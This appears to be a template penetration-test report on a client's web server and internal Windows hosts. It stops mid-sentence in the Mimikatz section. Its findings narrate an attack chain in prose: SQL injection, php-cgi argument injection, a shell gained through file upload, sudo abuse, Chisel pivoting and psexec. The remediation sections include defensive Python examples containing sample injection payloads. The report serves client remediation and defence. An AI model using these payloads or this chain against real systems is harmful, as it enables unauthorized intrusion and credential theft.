Example-Pentest-Report


Sensitive: The information in this document is strictly confidential and is intended for NOMBRECLIENTE

CYBERLAND SEC

Confidentiality Notice
This report contains sensitive, privileged, and confidential information. Precautions should be
taken to protect the confidentiality of the information in this document. Publication of this report
may cause reputational damage to NOMBRECLIENTE or facilitate attacks against
NOMBRECLIENTE. CYBERLAND SEC shall not be held liable for special, incidental, collateral
or consequential damages arising out of the use of this information.

Disclaimer
Note that this assessment may not disclose all vulnerabilities that are present on the systems
within the scope of the engagement. This report is a summary of the findings from a “point-in-
time” assessment made on NOMBRECLIENTE’s environment. Any changes made to the
environment during the period of testing may affect the results of the assessment.

NOMBRECLIENTE - CONFIDENTIAL Page 2

TABLE OF CONTENTS
Confidentiality Notice 1

Disclaimer 2

EXECUTIVE SUMMARY 5

HIGH LEVEL ASSESSMENT OVERVIEW 6

Observed Security Strengths 6

Areas for Improvement 6

Short Term Recommendations 7

SCOPE 8

Networks 8

NOMBRECLIENTE Environment 8

TESTING METHODOLOGY 9

CLASSIFICATION DEFINITIONS 10

Risk Classifications 10

Exploitation Likelihood Classifications 10

Business Impact Classifications 11

Remediation Difficulty Classifications 11

ASSESSMENT FINDINGS 12

Vulnerabilities Chart by Host 13

1 – 10.90.60.80 (NOMBRECLIENTE Web Server) 14

1.1 – SQL Injection 15

1.2 – PHP Common Gateway Interface (CGI) – CVE-2012-1823 19

1.3 – Cross Site Scripting (XSS) 22

1.4 – Unrestricted File Upload 24

1.5 – Privilege Escalation 27

1.6 – Information Disclosure 30


1.7 - Previous Pivoting Setup 35

2 – 10.185.10.34 38

2.1 –Eternal Blue / PSEXEC - CVE-2017-0144 (MS17-010) 39

2.2 – Dumped Credentials - Mimikatz 42

2.3 - Previous Pivoting Setup 45

3 – 10.185.10.27 47

3.1 – Eternal Blue – CVE-2017-0144 (MS17-010) 48

3.2 – Dumped Credentials - Mimikatz 52

3.3 – Information Disclosure 54

3.4 - Previous Pivoting Setup 56

4 – 10.185.10.55 58

4.1 – Buffer Over Flow (BOF) 59

4.2 – WinSCP Credentials in Memory 73

5 – 10.185.11.127 80

5.1 – Privilege Escalation 81

REMEDIATION PLAN 85

EXPLOITED HOSTS AND VULNERABILITIES 88

APPENDIX A – TOOLS USED 89

APPENDIX B - ENGAGEMENT INFORMATION 90

Client Information 90

Version Information 90

Contact Information 90


EXECUTIVE SUMMARY
CYBERLAND SEC performed a security assessment of the internal corporate network of
NOMBRECLIENTE on 25/05/2024. CYBERLAND SEC's penetration test simulated an attack
from an external threat actor attempting to gain access to systems within the NOMBRECLIENTE
corporate network. The purpose of this assessment was to discover and identify vulnerabilities
in NOMBRECLIENTE's infrastructure and suggest methods to remediate them.
CYBERLAND SEC identified a total of 14 vulnerabilities within the scope of the engagement,
broken down by severity in the table below.

CRITICAL HIGH MEDIUM LOW

8 4 1 1

The highest severity vulnerabilities give potential attackers the opportunity to execute arbitrary
code, gain unauthorized administrative access, exfiltrate sensitive data, and disrupt services.
These actions can lead to significant consequences, including data breaches, financial loss,
reputational damage, and operational downtime. Attackers might exploit these vulnerabilities to
install malware, manipulate or delete critical data, and move laterally within the network to
compromise additional systems. In order to ensure data confidentiality, integrity, and availability,
security remediations should be implemented as described in the security assessment findings.

Note that this assessment may not disclose all vulnerabilities that are present on the systems
within the scope. Any changes made to the environment during the period of testing may affect
the results of the assessment.


HIGH LEVEL ASSESSMENT OVERVIEW

Observed Security Strengths


CYBERLAND SEC identified the following strengths in NOMBRECLIENTE's network, which
greatly increase its security. NOMBRECLIENTE should continue to monitor these controls to
ensure they remain effective.

Network Segmentation
• Excellent implementation of network segmentation that isolates critical systems,
preventing lateral movement by attackers.

Regular Security Audits
• Proactive regular security audits and vulnerability assessments to identify and address
potential threats before they can be exploited.

Encryption
• Use of strong encryption protocols for data at rest and in transit, protecting sensitive
information from being intercepted or accessed by unauthorized parties.

Areas for Improvement


CYBERLAND SEC recommends NOMBRECLIENTE takes the following actions to improve the
security of the network. Implementing these recommendations will reduce the likelihood that an
attacker will be able to successfully attack NOMBRECLIENTE’s information systems and/or
reduce the impact of a successful attack.


Short Term Recommendations


CYBERLAND SEC recommends NOMBRECLIENTE take the following actions as soon as
possible to minimize business risk.

Incident Response
● Review and update the incident response plan to ensure it is ready to address potential
security incidents promptly and effectively.

Backup and Recovery


• Verify that all critical data is backed up regularly and that backup systems are
functioning correctly and securely.

Network Monitoring
• Implement and configure network monitoring tools to detect and respond to suspicious
activities in real-time.

Patch Management
• Ensure all systems and applications are updated with the latest security patches to
mitigate known vulnerabilities.


SCOPE
All testing was based on the scope as defined in the Request For Proposal (RFP) and official
written communications. The items in scope are listed below.

Networks

Network          Note
10.90.60.80      Web Server – foophonesels.com
10.185.10.0/23   Organization Network
10.185.10.0/24   Corporate Network
10.185.11.0/24   DMZ

NOMBRECLIENTE Environment


TESTING METHODOLOGY
CYBERLAND SEC's testing methodology was split into three phases: Reconnaissance, Target
Assessment, and Execution of Vulnerabilities. During reconnaissance, we gathered information
about NOMBRECLIENTE's network systems, using port scanning and other enumeration
methods to refine target information and assess target value. Next, we conducted the targeted
assessment, identifying vulnerabilities on the enumerated hosts. Finally, CYBERLAND SEC
simulated an attacker exploiting those vulnerabilities in the NOMBRECLIENTE network,
gathering evidence of each vulnerability while conducting the simulation in a manner that would
not disrupt normal business operations.

The following image is a graphical representation of this methodology.


CLASSIFICATION DEFINITIONS
Risk Classifications

Level          Score  Description
Critical       9-10   The vulnerability poses an immediate threat to the organization. Successful exploitation may permanently affect the organization. Remediation should be performed immediately.
High           7-8    The vulnerability poses an urgent threat to the organization, and remediation should be prioritized.
Medium         4-6    Successful exploitation is possible and may result in notable disruption of business functionality. This vulnerability should be remediated when feasible.
Low            1-3    The vulnerability poses a negligible/minimal threat to the organization. The presence of this vulnerability should be noted and remediated if possible.
Informational  0      These findings pose no clear threat to the organization, but may cause business processes to function differently than desired or reveal sensitive information about the company.

Exploitation Likelihood Classifications

Likelihood  Description
Likely      Exploitation methods are well-known and can be performed using publicly available tools. Low-skilled attackers and automated tools could successfully exploit the vulnerability with minimal difficulty.
Possible    Exploitation methods are well-known and may be performed using public tools, but require configuration. Understanding of the underlying system is required for successful exploitation.
Unlikely    Exploitation requires deep understanding of the underlying systems or advanced technical skills. Precise conditions may be required for successful exploitation.


Business Impact Classifications

Impact    Description
Major     Successful exploitation may result in large disruptions of critical business functions across the organization and significant financial damage.
Moderate  Successful exploitation may cause significant disruptions to non-critical business functions.
Minor     Successful exploitation may affect few users, without causing much disruption to routine business functions.

Remediation Difficulty Classifications

Difficulty  Description
Hard        Remediation may require extensive reconfiguration of underlying systems that is time consuming. Remediation may require disruption of normal business functions.
Moderate    Remediation may require minor reconfigurations or additions that may be time-intensive or expensive.
Easy        Remediation can be accomplished in a short amount of time, with little difficulty.


ASSESSMENT FINDINGS
Number  Finding                                            Risk Score  Risk      Host
1       SQL Injection                                      10          Critical  10.90.60.80
2       PHP Common Gateway Interface (CGI) – CVE-2012-1823 10          Critical  10.90.60.80
3       Unrestricted File Upload                           10          Critical  10.90.60.80
4       Privilege Escalation                               10          Critical  10.90.60.80
5       Eternal Blue – CVE-2017-0144 (MS17-010)            10          Critical  10.185.10.27
6       Eternal Blue – CVE-2017-0144 (MS17-010)            10          Critical  10.185.10.34
7       Information Disclosure                             9           Critical  10.90.60.80
8       Privilege Escalation                               9           Critical  10.185.11.127
9       Dumped Credentials - Mimikatz                      8           High      10.185.10.27
10      Buffer Over Flow (BOF)                             8           High      10.185.10.55
11      WinSCP Credentials in Memory                       8           High      10.185.10.55
12      Dumped Credentials - Mimikatz                      8           High      10.185.10.34
13      Cross Site Scripting (XSS)                         6           Medium    10.90.60.80
14      Information Disclosure                             3           Low       10.185.10.27

TEMPLATE NOTE: (Sorting by descending risk score)


Vulnerabilities Chart by Host


1 – 10.90.60.80 (Web Server)

Host: 10.90.60.80
OS: Linux

Port   Protocol / Service
80     HTTP
5923   HTTP

Figure 1.1: NMAP

Figure 1.2: NMAP open ports


1.1 – SQL Injection

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Code Injection

Description
SQL injection is an attack technique in which attacker-controlled input is inserted into the SQL
queries a web application builds, allowing the attacker to read and manipulate the application's
database without authorization. This can lead to data breaches, data loss, and unauthorized
administrative access.

Analysis
The login panel at http://10.90.60.80:5923/login.php is vulnerable to SQL injection.

Figure 1.1.1: SQL Injection

Having confirmed the injection point, we intercepted the login POST request with Burp Suite and
passed it to sqlmap to enumerate the database.


Figure 1.1.2: Intercept POST with Burp Suite

Figure 1.1.3a: Sqlmap


Figure 1.1.3b: MySQL DataBase


The page http://10.90.60.80:5923/services.php contains the same vulnerability. Through it we
were also able to obtain a command shell on the underlying host (Figures 1.1.4a and 1.1.4b).

Figure 1.1.4a: MySQL Shell command


Figure 1.1.4b: MySQL Shell

Remediation Plan

• Use parameterized queries (prepared statements) for every database access, so that user
input is always passed as data and never concatenated into the SQL text. This is the
primary defence; ORMs and stored procedures that bind their parameters achieve the
same result.

• Validate input as defence in depth: check that the type, length, and format of user input
are acceptable, use regular expressions as allowlists for structured data, and ensure that
fixed-set values (e.g., from drop-down lists) match one of the offered options exactly.

• Run the application with a least-privilege database account (no FILE privilege, no write
access to the web root, no access to other schemas), so that an injection cannot be
turned into file writes or command execution on the host, as was possible here.
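
As an added illustration (not code from the report or from the assessed application), the following Python fragment reproduces the shape of a login query against an in-memory SQLite table and contrasts the string-built query that causes the finding with a parameterized one. The table, the user michael and the password value are constructed for the example.

```python
import re
import sqlite3

# Constructed stand-in for the application's users table. Real applications
# store password hashes, not passwords; plaintext is used here only so the
# query shapes are easy to read.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('michael', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query: the input becomes part of the SQL text, so quotes and
    SQL keywords supplied by the user are parsed as SQL (the bug behind 1.1)."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Prepared statement: the driver binds the values separately from the SQL
    text, so the same payloads are compared as literal strings and fail."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Allowlist for usernames: defence in depth in front of the prepared statement.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Allowlist validation plus parameterized query. Validation alone is not
    enough (passwords legitimately contain quotes), which is why the
    parameterized query remains the primary control."""
    if USERNAME_RE.fullmatch(username) is None:
        return False
    return login_parameterized(conn, username, password)


if __name__ == "__main__":
    db = build_db()
    payload = "' OR '1'='1"
    print("vulnerable, injected password:", login_vulnerable(db, "michael", payload))
    print("parameterized, same payload:  ", login_parameterized(db, "michael", payload))
```

The classic payload in the password field turns the WHERE clause into (username = 'michael' AND password = '') OR '1'='1', which is always true against the string-built query and is simply a wrong password against the bound one.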

References

● https://github.com/sqlmapproject/sqlmap


1.2 – PHP Common Gateway Interface (CGI) – CVE-2012-1823

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Code Injection

Description
CVE-2012-1823 is a critical vulnerability in the CGI implementation of PHP (php-cgi): a query
string that contains no "=" is passed to the CGI binary as command-line arguments, so a remote
attacker can supply php-cgi options such as -s (show source) or -d (set an INI directive, e.g.
allow_url_include and auto_prepend_file) and execute arbitrary code. This can lead to complete
server compromise and unauthorized access to sensitive data.

Analysis
Enumerating with the Nikto tool, we found that php-cgi is exposed and vulnerable to CVE-2012-1823.

Figure 1.2.1: Enumeration with Nikto tool


Figure 1.2.2: PoC PHP CGI Vulnerability

We corroborated the vulnerability and used the Metasploit module shown in Figure 1.2.3 to
obtain a Meterpreter session.


Figure 1.2.3: Metasploit PHP CGI Module

Remediation Plan

• Upgrade PHP. The initial fix in PHP 5.3.12 / 5.4.2 was incomplete (CVE-2012-2311); use
PHP 5.3.13 / 5.4.3 or, preferably, a currently supported PHP release, and serve PHP through
php-fpm or mod_php rather than exposing php-cgi directly. Alternatively, the following
mod_rewrite rule can be used as a temporary mitigation on Apache; it drops any query string
that starts with "-" and contains no "=", which is exactly the form the CGI specification passes
to the program as command-line arguments:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]

RewriteRule ^(.*) $1?
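
To see exactly what that rule does and does not cover, here is an added Python check (not from the report, Apache or PHP) that applies the same regular expression to sample query strings, constructed for the example, next to the RFC 3875 condition under which a CGI server turns a query string into command-line arguments:

```python
import re

# Same pattern as the RewriteCond above; [NC] corresponds to re.IGNORECASE.
# mod_rewrite matches %{QUERY_STRING} as sent on the wire, still percent-encoded,
# which is why the pattern lists both "-" and "%2d".
REWRITE_COND = re.compile(r"^(%2d|-)[^=]+$", re.IGNORECASE)


def blocked_by_rewrite_rule(query_string: str) -> bool:
    """True if the mitigation strips this query string before it reaches php-cgi."""
    return REWRITE_COND.search(query_string) is not None


def passed_as_argv_by_cgi(query_string: str) -> bool:
    """RFC 3875 section 4.4: a non-empty query string containing no unencoded '='
    is split on '+', percent-decoded and handed to the CGI program as argv. That
    is the path CVE-2012-1823 abuses: php-cgi then parses '-s' or '-d' from argv."""
    return query_string != "" and "=" not in query_string


# Constructed samples: the two classic CVE-2012-1823 probes and ordinary requests.
# The value is whether the string should be treated as dangerous.
SAMPLES = {
    "-s": True,                                                            # show source
    "%2Ds": True,                                                          # encoded dash
    "-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input": True,  # RCE chain
    "id=1": False,
    "page=-s": False,                                                      # has '=', stays a query
}


def rule_matches_cgi_behaviour() -> bool:
    """The mitigation is sound for these samples iff it blocks exactly the
    strings that the CGI server would pass as argv."""
    return all(blocked_by_rewrite_rule(q) == passed_as_argv_by_cgi(q) == expected
               for q, expected in SAMPLES.items())
```

The rule only helps on Apache with mod_rewrite in front of php-cgi; any other front end (nginx, a load balancer) needs an equivalent filter, and neither replaces the upgrade. A quick regression check after deploying either fix is to request index.php?-s and confirm that PHP source is no longer returned.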

References

• https://pentesterlab.com/exercises/cve-2012-1823/course


1.3 – Cross Site Scripting (XSS)

MEDIUM

Exploitation Likelihood Possible

Business Impact Moderate

Remediation Difficulty Moderate

Type Code Injection

Description
Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to inject malicious
scripts into webpages viewed by other users. This can lead to data theft, session hijacking, and
defacement of the website.

Analysis
We edited a request to http://10.90.60.80/welcome.php, added a script payload and confirmed
that it is rendered and executed, i.e. that scripts can be injected.

Figure 1.3.1: XSS PoC


Remediation Plan

• Escaping: This involves processing user input to ensure it is safe before rendering it. By
escaping key characters like < and >, you prevent them from being interpreted
maliciously.

• Validating Input: This ensures only correct data is rendered by the application,
preventing malicious input. Whitelisting known good characters is more effective than
blacklisting bad characters for preventing XSS.

• Sanitizing: This method cleans user input to remove potentially harmful markup,
especially useful for sites that allow HTML. It should be used alongside escaping and
validating input for robust protection.

References

• https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html


1.4 – Unrestricted File Upload

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type File Upload

Description
A file upload vulnerability occurs when a web application does not properly validate or restrict
the types and content of files uploaded by users. Attackers can exploit this weakness by
uploading malicious files, such as scripts or executables, which can then be executed on the
server. This can lead to severe consequences, including remote code execution, unauthorized
access to sensitive data, defacement of websites, and the installation of malware.

Analysis
An exhaustive scan of files and directories with the GoBuster tool revealed two paths of
particular interest: /account.php (from which a new service can be created and a file
uploaded) and /pdf (where the uploaded files are stored).

Figure 1.4.1: Scanning files and directories with GoBuster tool


Figure 1.4.2: /account.php

Figure 1.4.3: /newservice.php – File Upload Page


Figure 1.4.4: /pdf – Uploads Directory

Remediation Plan

• Content-Type header validation: ensure the Content-Type of the upload is one the
application expects. On its own this is weak, because the header is set by the client and
trivially altered in a web proxy; treat it as a first filter only.

• Allowlist file extensions: validate the extension against an explicit allowlist (here, .pdf),
reject everything else, and watch for bypass techniques such as double extensions
(shell.php.pdf), trailing dots and null bytes in the name.

• File type detection: check the file's initial bytes (magic number) with a library or API
rather than trusting the name. Attackers can embed code inside an otherwise valid
header or file metadata and obfuscate or encode it, so this check complements, but does
not replace, the extension allowlist. Handle compressed files carefully.

• Store uploads outside the web root, or at least disable script execution in the upload
directory (for Apache and mod_php, php_flag engine off or RemoveHandler for /pdf), and
serve files under a random server-generated name. In this engagement the uploaded
script was executed directly from /pdf, which is what turned the upload into remote code
execution.
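
An added example of a validator that applies the checks above together (not the report's code and not the application's upload handler; the allowlist, dangerous-token list and sample file names are constructed for the example). Unlike a last-extension check alone, it rejects double extensions, null bytes in the name and content that does not start with the PDF magic bytes, and it never reuses the client-supplied file name.

```python
import os
import secrets

ALLOWED_EXTENSIONS = {"pdf"}
# Tokens that must not appear anywhere in the name. Apache's mod_mime treats
# every dot-separated part as an extension, so "shell.php.pdf" may still be
# handed to the PHP handler; an allowlist on the last token alone is not enough.
DANGEROUS_TOKENS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                    "cgi", "pl", "py", "sh", "htaccess"}
PDF_MAGIC = b"%PDF-"


class UploadRejected(ValueError):
    """Raised with a reason when an upload fails validation."""


def validate_upload(filename: str, content: bytes, content_type: str = "") -> str:
    """Validate an upload for the /pdf area and return the name to store it under.

    content_type is accepted only so callers can log it: it is chosen by the
    client (trivially changed in a web proxy) and is never a decision input.
    """
    base = os.path.basename(filename.replace("\\", "/"))   # drop path components
    if not base or "\x00" in base or not base.isprintable():
        raise UploadRejected("invalid characters in file name")
    tokens = base.lower().split(".")
    if len(tokens) < 2 or not tokens[0] or tokens[-1] == "":
        raise UploadRejected("missing extension")
    ext = tokens[-1]
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension .{ext} is not allowed")
    if any(tok in DANGEROUS_TOKENS for tok in tokens[1:-1]):
        raise UploadRejected("double extension")
    if not content.startswith(PDF_MAGIC):
        raise UploadRejected("content is not a PDF")
    # Never reuse the client-supplied name: random, server-chosen name plus the
    # validated extension. Store it outside the web root or in a directory with
    # script execution disabled.
    return f"{secrets.token_hex(16)}.{ext}"


def is_rejected(filename: str, content: bytes) -> bool:
    """Convenience wrapper: True if validate_upload refuses the file."""
    try:
        validate_upload(filename, content)
    except UploadRejected:
        return True
    return False
```

The magic-number check is deliberately strict about the first bytes only; a PDF that also contains PHP code in its body is still accepted, which is why the storage directory must not execute scripts regardless of what the validator lets through.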

References

• https://medium.com/@venkatasaimanikantamanugula/a-guide-to-preventing-file-upload-vulnerabilities-part-i-d1667eea0955


1.5 – Privilege Escalation

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Privilege Escalation

Description
Privilege escalation is a type of security vulnerability where an attacker gains elevated access to
resources that are normally protected from an application or user. This can occur in two forms:
1. Vertical Privilege Escalation: The attacker gains higher-level access than intended,
such as gaining administrative privileges.
2. Horizontal Privilege Escalation: The attacker accesses resources or functions
intended for other users with similar access levels.
Exploiting privilege escalation vulnerabilities can lead to unauthorized access to sensitive data,
the ability to alter system configurations, or even full control over the affected system. This
makes it crucial for systems to enforce strict access controls and regularly update and patch
software to prevent such exploits.

Analysis
After uploading a malicious Bash script through the file upload vulnerability (1.4) and triggering
its execution while listening with Netcat, we obtained a shell on the system as the www-data
user (a non-administrative account).

Figure 1.5.1: Accessing the system as user www-data


Once on the system, the sudo -l command lists the commands and binaries that the www-data
user is allowed to run as root.

Figure 1.5.2: Discovering that we can run as an administrator user

www-data may run the Perl script backup.pl as root. backup.pl calls copy.sh, which apparently
makes a copy of the .txt files in the directory, and copy.sh is writable by www-data. Appending a
command to the end of copy.sh means that, when backup.pl is run through sudo and the script
finishes, the appended command runs as root and gives us a root shell.


Figure 1.5.3: Modification of copy.sh

Figure 1.5.4: We are root

Remediation Plan

• Remove the sudo rule unless it is strictly required. If a script must run as root via sudo,
the script and every file it invokes (here backup.pl and copy.sh) must be owned by root
and not writable by the invoking user, its group, or others, and the script should call its
helpers by absolute path. A low-privileged user should never be able to alter files that a
root process executes.
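
A check a defender can run against every sudoers target, as an added Python example (not the report's code and not tied to the client's hosts): it walks the allowed script and every script it references and flags files that are writable by anyone but their owner or not owned by root. demo() rebuilds the backup.pl / copy.sh arrangement from the figures in a temporary directory; the file contents are constructed for the example.

```python
import os
import re
import stat
import tempfile

# Absolute paths as they appear inside shell/Perl scripts (interpreter, helpers).
ABS_PATH_RE = re.compile(r"(/[A-Za-z0-9_./-]+)")


def unsafe_perms(path: str) -> list:
    """Reasons a file executed via sudo is unsafe. Mode bits are inspected
    directly (not os.access) so the result does not depend on who runs the audit."""
    st = os.stat(path)
    reasons = []
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("writable by group/others")
    if st.st_uid != 0:
        reasons.append("owned by uid %d, not root" % st.st_uid)
    return reasons


def _is_script(path: str) -> bool:
    """Only '#!' files are parsed for further references; binaries are not read."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"#!"
    except OSError:
        return False


def audit_sudo_target(script: str, _seen=None) -> dict:
    """Check the sudo-allowed script and, recursively, every existing absolute
    path referenced from it (the interpreter, helpers such as copy.sh).
    Returns {path: [reasons]} for every unsafe file found."""
    seen = _seen if _seen is not None else set()
    findings = {}
    if script in seen or not os.path.isfile(script):
        return findings
    seen.add(script)
    reasons = unsafe_perms(script)
    if reasons:
        findings[script] = reasons
    if not _is_script(script):
        return findings
    try:
        with open(script, errors="replace") as fh:
            text = fh.read()
    except OSError:
        return findings
    for ref in ABS_PATH_RE.findall(text):
        findings.update(audit_sudo_target(ref, seen))
    return findings


def demo() -> dict:
    """Rebuild the report's setup in a temporary directory: backup.pl (the sudo
    target) invokes copy.sh, and copy.sh has been left world-writable."""
    d = tempfile.mkdtemp()
    copy_sh = os.path.join(d, "copy.sh")
    backup_pl = os.path.join(d, "backup.pl")
    with open(copy_sh, "w") as fh:
        fh.write("#!/bin/bash\ncp /var/www/data/*.txt /var/backups/\n")
    with open(backup_pl, "w") as fh:
        fh.write('#!/usr/bin/perl\nsystem("%s");\n' % copy_sh)
    os.chmod(backup_pl, 0o755)
    os.chmod(copy_sh, 0o777)  # the misconfiguration that gave root in 1.5
    return audit_sudo_target(backup_pl)


if __name__ == "__main__":
    for path, why in demo().items():
        print(path, "->", ", ".join(why))
```

Run as root the audit reports only the world-writable copy.sh; run as an ordinary user it additionally reports the temporary files as not root-owned, which is the correct answer for a real sudoers target living in a user-writable directory.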

References

• https://medium.com/secure-you/common-linux-privilege-escalation-d441329f41f9


1.6 – Information Disclosure

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Information Disclosure

Description
Information disclosure is a security vulnerability where sensitive data, such as system
configurations or user details, is exposed to unauthorized users. This can aid attackers in
planning further attacks, such as data breaches or privilege escalation.

Analysis
Once we had root access we listed the directories and found, in the home directory of the user
Michael, a file that discloses a host on the corporate network (10.185.10.0/24) together with
credentials.

Figure 1.6.1: Host and Credentials Discovery


We also found a file containing the access credentials for the MySQL database hosted locally
on the server.

Figure 1.6.2: Credentials of the Data Base


Figure 1.6.3: MySQL Data Base


Figure 1.6.4: Credentials founded on MySQL Database

Additionally, as root we can read the users' password hashes in /etc/shadow. They use the
legacy md5crypt scheme ($1$ prefix), a fast hash (not encryption) that tools like John the Ripper
or Hashcat can crack at high speed; if any of these passwords are reused elsewhere, the impact
grows accordingly.


Figure 1.6.5: /etc/shadow file

Remediation Plan

• If storing credentials in configuration files is unavoidable, ensure the files are encrypted
using strong encryption standards like AES-256. Ensure only authorized processes or
users can decrypt and access these files.

• Use secrets management solutions like HashiCorp Vault, AWS Secrets Manager, or
Azure Key Vault to securely store and manage access to sensitive information.


• Replace md5crypt for local account passwords with a stronger password hashing scheme:
on current Linux distributions set ENCRYPT_METHOD to SHA512 or YESCRYPT in
/etc/login.defs (or the equivalent PAM configuration) and force a password change
(chage -d 0 <user>) so that every account is re-hashed. Application-level passwords
should use bcrypt, scrypt or Argon2. Plain SHA-256 is not a password hash, and none of
these schemes are encryption: they are deliberately slow one-way hashes with per-user
salts, which is what limits brute force.
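
To find such accounts without cracking anything, the following added Python snippet (not from the report; the shadow lines are constructed and the digest values are placeholders, not real hashes) classifies each /etc/shadow entry by its crypt(3) identifier and reports the ones still using md5crypt, traditional DES or no password at all:

```python
# crypt(3) scheme identifiers as they appear between the leading '$' signs.
# The boolean marks schemes that should no longer be used for passwords.
CRYPT_SCHEMES = {
    "1":  ("md5crypt", True),
    "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False),
    "5":  ("sha256crypt", False),
    "6":  ("sha512crypt", False),
    "7":  ("scrypt", False),
    "y":  ("yescrypt", False),
    "gy": ("gost-yescrypt", False),
}

# Constructed sample in /etc/shadow layout: user:hash:lastchange:min:max:warn:::
# The digests are placeholders of plausible shape, not real hashes.
SAMPLE_SHADOW = """\
root:$6$rounds=5000$Ab12Cd34$PLACEHOLDERSHA512DIGESTPLACEHOLDERSHA512DIGESTPLACEHOLDERSHA512DIGES86:19500:0:99999:7:::
michael:$1$Ab12Cd34$PLACEHOLDERMD5DIGEST12:19500:0:99999:7:::
www-data:*:19500:0:99999:7:::
backup:!:19500:0:99999:7:::
legacy:abJnggxhB/yWI:19500:0:99999:7:::
guest::19500:0:99999:7:::
"""


def classify_hash(field: str):
    """Return (scheme name, weak?) for the second field of a shadow entry."""
    if field == "":
        return ("empty password", True)          # login without a password
    if field.startswith(("*", "!")):
        return ("locked / no password login", False)
    if field.startswith("$"):
        ident = field.split("$")[1]
        return CRYPT_SCHEMES.get(ident, ("unknown $%s$" % ident, True))
    return ("traditional DES crypt", True)       # 13-char hash, no $id$ prefix


def weak_accounts(shadow_text: str) -> list:
    """[(user, scheme)] for every entry whose hash scheme is considered weak."""
    weak = []
    for line in shadow_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, field = line.split(":")[:2]
        scheme, is_weak = classify_hash(field)
        if is_weak:
            weak.append((user, scheme))
    return weak


if __name__ == "__main__":
    for user, scheme in weak_accounts(SAMPLE_SHADOW):
        print(f"{user}: {scheme}")
```

Changing ENCRYPT_METHOD only affects passwords set from then on, so the audit should be re-run after the forced password change to confirm that no $1$ or unprefixed entries remain.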

References

• https://www.quora.com/What-makes-MD5-such-a-bad-hashing-algorithm

1.7 - Previous Pivoting Setup


In order to reach machine 10.185.10.34 we configure a tunnel with the Chisel tool: a Chisel
server on our attacking machine and a Chisel client on the compromised host 10.90.60.80, so
that commands for 10.185.10.34 can be sent from our machine through that host.

First we transfer the required files to 10.90.60.80 from a Python HTTP server running on our
machine.

Figure 1.7.1: Python HTTP Server – Share files


Figure 1.7.2: Download the files and grant execution permissions

We run the Chisel server on our machine and the client on machine 10.90.60.80

Figure 1.7.3: Chisel Server

Figure 1.7.4: Chisel Client on 10.90.60.80


Finally we add the proxy endpoint exposed by the tunnel to the /etc/proxychains4.conf file, so
that tools run through proxychains reach the internal network.

Figure 1.7.5: Edit /etc/proxychains4.conf file


2 – 10.185.10.34

Host: 10.185.10.34
OS: Windows 7 SP1

Port   Protocol / Service
135    MSRPC
139    NetBIOS-SSN
445    SMB

Figure 2a: NMAP - Proxychains


Figure 2b: NMAP open ports

2.1 – Eternal Blue / PSEXEC - CVE-2017-0144 (MS17-010)

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Credentials / Remote Code Execution

Description
Storing credentials in plain text in a configuration file or script, such as mount_windows_mf.sh,
is a significant security weakness: anyone who can read the file obtains working credentials and
can use them against other systems. Here the credentials recovered earlier in the engagement
gave administrative access to this host over SMB.

Analysis
Using the psexec tool from impacket with the recovered credentials, the command shown in
Figure 2.1.1 gives us a shell on the machine with administrator privileges. Note that psexec
authenticates with valid credentials and does not itself exploit MS17-010; the findings table also
lists this host as affected by MS17-010, which is why both issues are covered in the remediation
below.


Figure 2.1.1: PSEXEC tool – Administrator access to Machine

Browsing through the directories we found files that appear to be a binary run on another
machine; we downloaded them for later use.

Figure 2.1.2: Host Discovery – 10.185.10.55


Figure 2.1.3: SMBCLIENT

Figure 2.1.4: Download files

Additionally, using the arp -a command, we find another active host, 10.185.10.27.

Figure 2.1.5: Host Discovery- 10.185.10.27


Another way to discover hosts from a Windows machine is a ping sweep.

Figure 2.1.6: Ping sweep on Windows

Remediation Plan

• Apply the MS17-010 security update (for Windows 7 SP1: KB4012212 security-only update
or KB4012215 monthly rollup, March 2017) and disable SMBv1 on every Windows host;
verify the installation with the Microsoft procedure referenced below.

• Remove the plaintext credentials from mount_windows_mf.sh and rotate them; use a
dedicated, least-privilege account for the mount rather than an administrator account.

• Windows 7 reached end of support in January 2020. If possible, upgrade to a supported
Windows release (Windows 10 or later).

References

• https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/psexec.md

• https://support.microsoft.com/en-us/help/4023262/how-to-verify-that-ms17-010-is-installed

2.2 – Dumped Credentials - Mimikatz

HIGH

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Credentials saved in memory

Description
Credential dumping with Mimikatz is a technique where an attacker uses the Mimikatz tool to
extract plaintext passwords, hash values, PINs, and Kerberos tickets from memory on a
Windows system or, as here with lsadump::sam and lsadump::secrets, the local account hashes
and LSA secrets from the registry hives. This allows attackers to gain unauthorized access to
